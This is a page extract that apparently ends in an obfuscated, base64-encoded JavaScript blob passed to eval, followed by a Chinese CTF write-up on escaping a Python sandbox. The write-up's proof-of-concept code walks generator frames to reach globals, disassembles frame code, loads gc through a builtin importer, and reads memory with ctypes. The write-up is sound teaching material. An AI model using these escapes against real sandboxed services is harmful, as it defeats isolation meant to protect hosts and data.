eHRjVlNvK1c3SmRWU29WV1EvZEhTb3p0YWZxb21rcVdPUGp0U283V1FlMHgzUmROTUJkVk5sZE5ta1h3TG51VzZOY0szcklXN1RFV1JIMkU4bzBXUGhkTkNrK1c2RmRPU2tJejhrTlc2Ymh0U280c2FsY1VnNXdXT3RkUjhvdFc3bWZvaDNjUlduTVdST0lrU29xdUNvbmlmN2RUU2s3dkNvRG1kUmNSbWtQV1BWY1Q4azZXUHhjTmFhVVdQMFBFYk9tcUNvVFdQWmNTbW9XV1E1Tlc2dUdwbWtXd1dpbldPUmNLbWtRV080U1dSL2RRdFczVzdiMFc0SmRUQ2tDV1AwcnRNaGNWaFZjT2cwZFdSTmRQSi9kUUNrcVc2aGRQQ2tFQ21vcVc0L2RTMEpkT1lOZFZtb2ZXT3lQVzRWY0k4b0FXNkcrV085UmxTazdXNUJjU1NvV3dDb0lmU2tHYThvWldPL2RTU290V1BDZVc2blFXUGEwcDB4Y1Bta3hXNFdjV1BUbG1mUmNQc1NmV1BaY0pIWFJmckM3VzVSY1E4by9XNXlCVzU5V3ZHT3BrbW9YV1Juc1dQZjNXN1pjSDhrR2c4b2lqbW9jV1B5VFc2eWlXNnJBV09TQ21hUmNObWt3VzYwUFc1ekNXNXhkVXhwZFFta2dzOGtKdlhiZ1c3ekxCQ2svQnR6WFc3cGNJQ2s3V1J0Y0tDb1N1dHRjUmJwY1FHUmNOME5jSXJXcmU4b255bWthaXdKZElXOXRySUZjVG1rOERNOFdxbWttRENrUFc0TmRJMTNjTXRxMmhTa1FoMmkwQnNkY0pJWmNSU2tGaUp0Y1FTa0h1OGtGeThrNnlzL2RHZi9kUFNrcXJkM2NNdXlCcThvdW1tazlXUHRjUVNveFdRZGRWR2FMRlNrTlc0ODhCdnhkTzhvNXNldGROcVpjSG1vUW1Ta21kZDFiVzQ5dmdXZnFoWHBjUThrWFc0eGNTY3ZYVzVqcmN0dGRMSDNkS05YOGRxbGNWZ3RjVkxKZFBTa2dETlBVRHZ1c1dSdGNUaDhqcHFTM2htaytXNzNkUW1rZ3k4a1VXUXhkS1NrcldReGNVTS9jVThvMHRta1dpdzQ1VzYzY1EyL2RSU2tJb21vZ1c0bGNHQ2s4eENrNmFDa3V6U2tOV1JkY0tmcW5pQ28zV1I0S1dPcGNSd2o0V08zY1BTb2lwQ2tnaW1vRGhZem9XT2F3ZDhvZVc0aGNVOG95ZUpieGdZWmNKOG9RQ3E0ZVdRbGNMdnE4V1FwZFRTb0NXNnhkSEdyZHhjWmRWbWtYelkzY1ViS3BXUVZjSENrNkZYQmRJbW9ZVzZteVc2RHJXNHphc2FHa1dPbVdXNHlHbzNlMGFMZGRRQ29vRFNvb1dQbGRMWlZjUHU5RkJDb0puOGtVV1AvY0h2VmNMY3RkVFNvZFc3TmRRbW8vV09WY1FzRDVXNHlnemNLNFc3YTJ6bW9xclptUkI4b09XUHBjVENvR3hDa3lXT1ZjS1hkZFNzM2NLbWtBV1JoZFNtb0lhOGtub0NvSWNJbGNRQ29UeUNrY1dQbGNMWGhkVVNvN1c1TmRPWHBjTndHY1dQRmNMMEQyQlNvbVdRdGRJOG9oV1BkZFNlL2RTQ281dWZ2R1dSenRXUmlYVzRXbldSM2ROR3orV1JWY1Fta3VtcUxaV1JoZFZJMHdmbW9uVzZWZE1NVzBXNkJkSm1ranRmSDBmMDFRbmViTERDa0loU29raHRaZFJMOHZXNGlIQTF6NnRJTmNQcWZpc2VLcndjWmRVd2RkT3hkZFA4a2RiOG9KQU5WZEttb3plSlZkUzNDWWVtbzRXNEZkTWJwZE9ZVFlXNXZtb0NvWVc2cVFXN1c4VzRKY1A4b3pXUW1ybThvdldRdGRKdThWdUNrMWpncGNKOGsxVzZCZEl0M2NKQ29rZ2ZaY1N3aGRRQ2tBZ0tOZEg4azFEOG93V1JCZEpxVmNVWDk4eThrUFdQN2NSU2tJRjhrNlc1ZWJXUnRjT21vSFdPL2NIU2tYVzRYNlc0T0ZXNUZkTlNrZFdPYjdXNXVHVzR2c2Ftb3dXUUtQVzdaY1Ztb1hkZVZkUzFOZEczdGNOWk5jVDhvc1dRcGRPOGtxRHJaY0l1aWpXNFJjTm1rSldSN2RWQ29jVzVWY1VTa3hGU2tBdVNrSldSUmRPbWtiVzcvZEw4b0pXUFJjSGNWY1BDb0hXNjhzeU1WY0c4azBBTm1FV09OY1BaVmNMR210cm1rRUNta0RwOGs0RGE0Zlc0QmRTWGxkVjhrQ2Vta0RlOG9UaXZOZExDbzBDQ29abDhrWUFtbzFXT1REZHhhN1dReGNHMmE1V1E5TEVOU0VXUGhjU1NvQ1c2QmRTSmpGV1FOZEpDa3B3Q2tuRFNvVVdRM2RUU29qVzdSZFBLYjd4WTFyZUNvbVdPeWhqSXhjSm1rZXhtb0RpSUhObkNreW8zdUJXT1pkVENrb1dSQzNidzk2V1A1SndYV1NsbW9acFdwZFBTa3dXN0JkT3M1TGIxTmNMdFZkTkNvY3Y4bzdrcU9oRG1vWFc3L2NVSUtjaHZMb1dPT0ZlQ283V1BkZEdDb2d1U2tOZjB0Y0t2RmNHU2tlV1J5Z1c3L2NIQ29vV1FCZFZTa2lhOG9FV1JXS1c2R3hXUHJhcXg4NUZJZUNXNWRkVUtQNGRzdGNJYWRkS3Nqclc3VmRHQ2tWVzYvZE5Ta1lXN253Rk10Y09tby9yOGtCVzQzY084b0FXT1pkSk00cVdSSmRWYzljejhrNkJtb2hXNGVBcUdhMWE4b3BXUGRkVHFpSFc1dkZGU2tPczhvQm9Ta0ZXUUxZZWNKY0dDb3lqczErRVNvaXNLSmRVS0ZkSm1ra2RJcGRTU2tkcWUzZE11OE5XNGhjTG1veVc2ak5XUXBjTjNsY0hLWmRKU2t5V1JlZldPdGNPS2pmRG1reFdPQmRITmpaV1I1NldQSEVXUmRjVHR1dVc1OTVXNjBtbHN0Y0t3cldibW8xVzZTeWQwQmRVY0QvV1FCY09Db2F1bWtLVzZyb1dSenhXNE9uVzZxakVTb2dXNlJkSWJkZElncjZsbWtZc0NrZ2tiUzJ5ZEZkT1NrUmdJQmNRbW8zV09SZEtOL2NRU29QYXZ4Y0gwN2RNbWtVV09GY0k4b2RjbWtEcHJISldQRDlGYjV4YUNrUWc4a1RvdXBkVXJEaFdQTDdiU29DV1I0OFdReGRQOGtDdVluQ244a2JXUG0wV1F1bEQyRmRJaC9jS3dXcXNlcW1XNkRkVzRoZFFTbzZXUkJkTU1HN213L2RTOG90V09CY01ta0FXUVR4VzZPWnZ2ZGNNMnZVQVNvSHFDa1pXNC9kUzFqRFdRNGxXN1Q5VzdUa1dRcGNLU29xQTEvY1U4b0dBbW9jQmZSY1VxSmRNQ2twV1FwZFNDb0pXUmlKVzRYd1dSbGNHOG9TQkNvQldPWmRLd0JjS21vM0M4b0dXUC9jTVNvMVdQTmRRU29hVzVhV1c3RmNJU2tVZmM4YVdQN2NJOG80Vzc3Y1NDb1hzOGtic21vVFc3ZkxXUFpkVmZmSkVkZGRVd1ZkSlNrQVc3QmRQY0ZkUk1QTFdSQmRPOG9kV1B6Q1dRUDhXUEJjVm1vMldPbUVvbWtNVzZxRFc3NVZXNTdjUjhrRVdPL2RIU29HV1B5aGxtbzdiU2szVzZxL211akdXUEJkT21rRFc1L2RVbW9JZGU5L2ptb1prMlJkUk5tcFdPcWxXT2Fod21vbmtTb2ZXNjh2RnRCY0lDazdCU2tadXJSY1VTb1BoYnpPY2ZkZE5Tb0ZlYVdpV1Ftd1c1TFVXN0pkS2JPTVdSZGNPU29zVzVYY1c0MEpXNEcyZ21vS0Q4b09XUDNjR1NvMXFDa0lXUmRkTHZqeVc0ZGNKbW9YV1FSZEdTa3prOG9lb21rS2pTa3R2TDdkUFlDVFdSTHZXUUpkVThrVG5aRzRFTVhPQzBqZkJjZnhrQ29mVzZ2eldPN2NVbWt6V1FSY1Jta3lXN0RHV1J4ZFBta1lXUU5jRzhrK3QxdGNUTGxkS0NvTVdQWmRWOGs5dmQzZEdTa0ZyOGtEdzhrR1c0RmROOGt0cjNKY1FhSmRMQ29oaUd5Y1c1T05BOGtGJywneXd4Y09Ta0VXNmknLCdXUTNjVG1rVHJta2YnLCd4SXhkUXFlRycsJ3V0dURXN2hkSFNrWFdQV2UnLCdXUHBkSGEnLCdmcm52V09mOGxIRmRKbWtxVzViM1c3QycsJ1dSdVonLCdXT1JjTkNrNnNTa01XNWZOZlcnLCdsQ29kJywnZkkwaWJXMDVxRycsJ0F3NCcsJ3A4bzZXUFM4VzdLJywnV1FOY1M4bzV6U29nV09wZE1Da2JXUXVXYW1veScsJ2JoTmRMZlBjekNrTFc0ekNDU2tqeEcnLCdXNmJSY2d4Y0dHM2RUbWtWcVNvV0JXJywndXNLJywndXhQbHVMNHN1U29TbTJ0Y0txJywnZ3J5JywnVzVCZE1Tb2JlbW8vV1BlSXdDbzVXNlgzRWEnLCdGTlJkR3FwY1I4azJvbW9ZV1JOY0dKcUInLCdxU2tUJywnYmZ0Y09XQmROYmJocm1rU3lXJywneExlblc1YTgnLCdqWWEnLCdqY2xkTENvSUYzaTZBcScsJ3A4b20nLCdFbW92a3IvZE1hdTBlYScsJ2xIbGRQU2tFbWEnLCdXT3hjUzhrRldPbGRSWFZkUm1vYicsJ0IwSmNPSVQvJ107XzB4MmE4Mz1mdW5jdGlvbigpe3JldHVybiBfMHhlYjg5NDc7fTtyZXR1cm4gXzB4MmE4MygpO31mdW5jdGlvbiBfMHgzNmY3ZDcoKXt2YXIgXzB4M2VmOGI2PV8weDRkNDUsXzB4MmIzOTBiPShmdW5jdGlvbigpe2lmKCd0VWVHdichPT0ndFVlR3YnKXJldHVybiBfMHgzZWFkMmEoXzB4MTBkODY0KTtlbHNle3ZhciBfMHhjNTJlODM9ISFbXTtyZXR1cm4gZnVuY3Rpb24oXzB4MjVkMDYzLF8weDE0YjBhZil7dmFyIF8weDE5YjU2YT1fMHg0ZDQ1O2lmKCdtSFhPeCc9PT1fMHgxOWI1NmEoMHgyMjUsJ0FkQUYnKSlfMHgzNGQ5M2QoXzB4MmQwMWFkKSgpO2Vsc2V7dmFyIF8weDQzNWU0Mz1fMHhjNTJlODM/ZnVuY3Rpb24oKXtpZihfMHgxNGIwYWYpe3ZhciBfMHgyNzhjOWU9XzB4MTRiMGFmWydhcHBseSddKF8weDI1ZDA2Myxhcmd1bWVudHMpO3JldHVybiBfMHgxNGIwYWY9bnVsbCxfMHgyNzhjOWU7fX06ZnVuY3Rpb24oKXt9O3JldHVybiBfMHhjNTJlODM9IVtdLF8weDQzNWU0Mzt9fTt9fSgpKSxfMHgxMjYwMGM9XzB4MmIzOTBiKHRoaXMsZnVuY3Rpb24oKXt2YXIgXzB4NDZiYmY5PV8weDRkNDU7cmV0dXJuIF8weDEyNjAwY1tfMHg0NmJiZjkoMHgyMTEsJ0RHbHQnKV0oKVsnc2VhcmNoJ10oXzB4NDZiYmY5KDB4MjFjLCdER2x0JykpW18weDQ2YmJmOSgweDIwMSwnW1NwdicpXSgpW18weDQ2YmJmOSgweDFmYiwnJmhlXicpXShfMHgxMjYwMGMpWydzZWFyY2gnXSgnKCgoLispKykrKSskJyk7fSk7cmV0dXJuIF8weDEyNjAwYygpLF8weDNlZjhiNigweDIwOSwnWFNETycpK18weDNlZjhiNigweDIxMCwnQkRaVScpK18weDNlZjhiNigweDFmNCwnRHlMRycpK18weDNlZjhiNigweDIyOSwnaGdbQCcpK18weDNlZjhiNigweDIwMiwnWFNETycpK18weDNlZjhiNigweDIyMywnbXBHaScpK18weDNlZjhiNigweDFmNSwnSkFqeScpK18weDNlZjhiNigweDIxOSwnVThOWycpK18weDNlZjhiNigweDFmMiwnVHR4VCcpK18weDNlZjhiNigweDFmNiwnd0E4dCcpK18weDNlZjhiNigweDIwNSwnZSl2TCcpK18weDNlZjhiNigweDIxNCwnZUZVOScpK18weDNlZjhiNigweDIxZiwnWFNETycpO312YXIgXzB4NGQwMzJkPWV2YWwoXzB4MzZmN2Q3KClbJ3NwbGl0J10oXzB4NDJkNjUzKDB4MjEyLCdUdHhUJykpWzB4ZjZhKzB4MTJiOSoweDErLTB4MjIyMV0pLF8weDI4MGJiZj1ldmFsKF8weDM2ZjdkNygpW18weDQyZDY1MygweDIyMCwnQGwqZCcpXShfMHg0MmQ2NTMoMHgyMWUsJ2VFJiQnKSlbMHgyMmIxKy0weDJlKjB4NTIrLTB4MTNmMV0pLF8weDNlZGUxNj1ldmFsKF8weDM2ZjdkNygpW18weDQyZDY1MygweDFmOCwnZiUoaCcpXShfMHg0MmQ2NTMoMHgyMjEsJ0FkQUYnKSlbMHgxZCotMHhkZisweDIqMHhmY2QrLTB4MSoweDY1Ml0pLF8weDEzYTE1NT1ldmFsKF8weDM2ZjdkNygpW18weDQyZDY1MygweDIyNywnbyUkTCcpXShfMHg0MmQ2NTMoMHgyMWIsJzFNYzAnKSlbMHhjMmIqMHgzKy0weDMqLTB4OWMxKy0weDQxYmVdKTsoZnVuY3Rpb24oXzB4NWRhMTViKXtyZXR1cm4gXzB4NWRhMTViKF8weDVkYTE1Yik7fShmdW5jdGlvbihfMHhjNGJlOGQpe3JldHVybiBmdW5jdGlvbihfMHgzYTMxNzYpe3ZhciBfMHg1MTI1MWE9XzB4NGQ0NTtmb3IodmFyIF8weDc5MzZkMD0weDIzMWErMHhlMmYrLTB4MzE0OTtfMHg3OTM2ZDA8MHgxZDAxKzB4MioweDIwKy0weDMzNSoweDk7XzB4NzkzNmQwKyspe2lmKF8weDUxMjUxYSgweDIxNSwnRFVjKScpPT09XzB4NTEyNTFhKDB4MjBiLCdER2x0Jykpe2Zvcih2YXIgXzB4NDE5ODRlPTB4YzgqLTB4MistMHgyMTU3KzB4MjJlNztfMHg0MTk4NGU8LTB4ZjFlKzB4MSoweDFmOWIrLTB4MTAxOTtfMHg0MTk4NGUrKyl7dmFyIF8weDU2ZTBiMD0hW10sXzB4OWU3NTk1PV8weDc2MmMyOCgpW18weDUxMjUxYSgweDIwYSwnSUNCWicpXShfMHg1MTI1MWEoMHgyMTQsJ2VGVTknKSlbMHgxODE4KzB4ZioweDI4NCstMHgxNDljKjB4M10sXzB4Mjc3M2ZlPSgtMHgxYzU1Ky0weDNhKjB4YWErMHg0MzE1KSpfMHg0MTk4NGUvKDB4MSoweGMwNystMHhkKi0weDJkZCstMHgzYioweGQ0KSxfMHgxYjk5ZjE9LTB4MSoweGU3YisweDEyMGQrLTB4N2EqMHg3LSgweDFkYzUqMHgxKzB4MWEzNSotMHgxKy0weGMqMHg0NykqXzB4NDE5ODRlLygtMHgxOTQwKjB4MSsweDI1MzUrLTB4YjkxKTtfMHgxNWE4Y2IoKT49LTB4NyoweDQxKzB4MjY1NyotMHgxKzB4MjgxZSswLjk5OTkmJihfMHg5ZTc1OTU9XzB4YzE2YzE2KClbXzB4NTEyNTFhKDB4MjBjLCdVOE5bJyldKF8weDUxMjUxYSgweDIyYSwnW1NwdicpKVstMHg4MDUrMHgyMDYqMHgxKzB4NjAwXSxfMHg1NmUwYjA9ISFbXSk7XzB4MTU3MTViKF8weDUxMjUxYSgweDIwNywnc0N2TCcpLF8weDllNzU5NVtfMHg1MTI1MWEoMHgyMTMsJ0RocyonKV0oL1x7YVx9L2dtLF8weDI3NzNmZStfMHg1MTI1MWEoMHgxZmUsJ0BsKmQnKSlbJ3JlcGxhY2UnXSgvXHtiXH0vZ20sXzB4MWI5OWYxK18weDUxMjUxYSgweDFmZSwnQGwqZCcpKSk7aWYoXzB4NTZlMGIwKV8weDIwZmRlOCgpO31fMHgzNTQ2OTgoZnVuY3Rpb24oKXtfMHg1ZjRhZDIoXzB4MzFhYzZkKSgpO30sLTB4MjJiOCstMHgzKjB4N2Q5KzB4YzBiKjB4NSksXzB4MzU1YWY4KF8weGNmM2RhYSwweDFjMTArMHg1MDUrLTB4MWY1Myk7fWVsc2V7dmFyIF8weDM4ZDk2MT0hW10sXzB4NDhiOGFhPV8weDM2ZjdkNygpWydzcGxpdCddKF8weDUxMjUxYSgweDIwZSwndChLeCcpKVsweDFhZTIrLTB4N2E5Ky0weDEzMzldLF8weDQ4YTRhYT0oLTB4MjI3YSoweDErMHg3YyoweDFhKzB4MTYxZSkqXzB4NzkzNmQwLygtMHgzKjB4YThkKzB4MjI3NSstMHgyNmEpLF8weDU0ODcwZD0weDIzZmYrMHgxKjB4MTBjZistMHgzNDkyLSgweDE2NjMrLTB4MmEzKi0weDMrLTB4MWUxMCkqXzB4NzkzNmQwLygweDcqLTB4MmYyKy0weDFjYjUrMHgzMWI3KTtfMHgyODBiYmYoKT49LTB4MiotMHg3YWMrLTB4N2QqMHgxMystMHg2MTErMC4wMDAxJiYoXzB4NDhiOGFhPV8weDM2ZjdkNygpW18weDUxMjUxYSgweDIyOCwneEBiSicpXShfMHg1MTI1MWEoMHgxZWYsJ0prYm4nKSlbMHhmMzErMHgyNGQqLTB4MTArLTB4NTY4Ki0weDRdLF8weDM4ZDk2MT0hIVtdKTtfMHg0ZDAzMmQoXzB4NTEyNTFhKDB4MWYzLCdmJShoJyksXzB4NDhiOGFhWydyZXBsYWNlJ10oL1x7YVx9L2dtLF8weDQ4YTRhYStfMHg1MTI1MWEoMHgxZmUsJ0BsKmQnKSlbXzB4NTEyNTFhKDB4MWZhLCcxTWMwJyldKC9ce2JcfS9nbSxfMHg1NDg3MGQrXzB4NTEyNTFhKDB4MWZlLCdAbCpkJykpKTt9fV8weDEzYTE1NShmdW5jdGlvbigpe3ZhciBfMHg0ZDliMzE9XzB4NTEyNTFhO2lmKF8weDRkOWIzMSgweDIwOCwnQWRBRicpIT09J3FGakdoJyl7dmFyIF8weDQzMjgwNz1fMHgxMjQ1NDY/ZnVuY3Rpb24oKXt2YXIgXzB4NTNkYjQ2PV8weDRkOWIzMTtpZihfMHg0YmE0Njcpe3ZhciBfMHgxZDA5MmU9XzB4YWE4M2RkW18weDUzZGI0NigweDIwNCwnNWVFTScpXShfMHgxMzIxMGMsYXJndW1lbnRzKTtyZXR1cm4gXzB4NTY4MTZhPW51bGwsXzB4MWQwOTJlO319OmZ1bmN0aW9uKCl7fTtyZXR1cm4gXzB4M2U3MzU3PSFbXSxfMHg0MzI4MDc7fWVsc2UgXzB4YzRiZThkKF8weGM0YmU4ZCkoKTt9LC0weDEqMHgyMGMzKy0weGMqLTB4MTM3Ky0weDUqLTB4NDA3KSxfMHgxM2ExNTUoXzB4NGQzZmI0LDB4MjM1MSotMHgxKy0weDdiKi0weDMrMHgyM2EyKTt9O30pKCkpOw=="))
</script>
</body>
</html>
|
菜狗工具#2
python栈帧沙箱逃逸
法一:
一直往上找,直到找到app.py所在的栈帧,然后读取全局变量,poc:
1
2
3
4
5
6
7
8
9
10
| def test():
def f():
yield g.gi_frame.f_back
g = f()
frame = next(g)
print(frame)
print(frame.f_back)
print(frame.f_back.f_back.f_globals)
test()
|
这里因为源码里对flag重复赋值了一次导致直接查app.py的f_globals得不到flag
需要对其栈帧进行反汇编拿到初次赋值的flag
1
2
3
4
5
| out = io.StringIO()
dis.dis(frame.f_code,file=out)
content = out.getvalue()
out.close()
print(content)
|
参考官方wp:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
| sys = print.__globals__["__builtins__"].__import__('sys')
io = print.__globals__["__builtins__"].__import__('io')
dis = print.__globals__["__builtins__"].__import__('dis')
threading = print.__globals__["__builtins__"].__import__('threading')
print(threading.enumerate())
print(threading.main_thread())
print(threading.main_thread().ident)
print(sys._current_frames())
print(sys._current_frames()[threading.main_thread().ident])
frame = sys._current_frames()[threading.main_thread().ident]
while frame is not None:
out = io.StringIO()
dis.dis(frame.f_code,file=out)
content = out.getvalue()
out.close()
print(content)
frame = frame.f_back
|
法二:
由于过滤了__import__,这里要自己找一个能加载模块的类
最后选择了_frozen_importlib.BuiltinImporter这个可以导入内置模块的查找器,然后加载gc模块,获取所有变量对象即可。
1
| print([].__class__.__base__.__subclasses__()[84].load_module('gc').get_objects())
|
法三:
晨曦✌的思路:
可以利用指针,把内存的内容读出来,但需要定位一个大致的范围,盲目读取浪费时间
先利用栈帧逃逸到全局,这样就能拿__builtins__和被覆盖后的flag的地址(这里可以参考L3HCTF2024 intractable problem)
全局flag的地址用id()读出来即可
接着是利用ctypes模块的指针,用id()将flag地址周围的值读一下,用ctypes.cast实现一个从内存读源码的操作
ctypes.cast(obj, type) 此函数类似于 C 的强制转换运算符。 它返回一个 type 的新实例,该实例指向与 obj 相同的内存块。 type 必须为指针类型,而 obj 必须为可以被作为指针来解读的对象。
这里用了 char 指针,读出来的是一个字符串,再加上flag头作为判断,可以很快读出flag
每次位移8的倍数。(可以自行对比任意两个变量的地址,可以发现它们的差值都是8的倍数)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| def f():
yield g.gi_frame.f_back.f_back
g = f()
frame = [x for x in g][0]
b = frame.f_back.f_globals
flag_id=id(b['flag'])
ctypes = b["__builtins__"].__import__('ctypes')
for i in range(10000):
txt = ctypes.cast((flag_id-8*i),ctypes.c_char_p).value
if b"flag{" in txt:
print(txt)
break
|
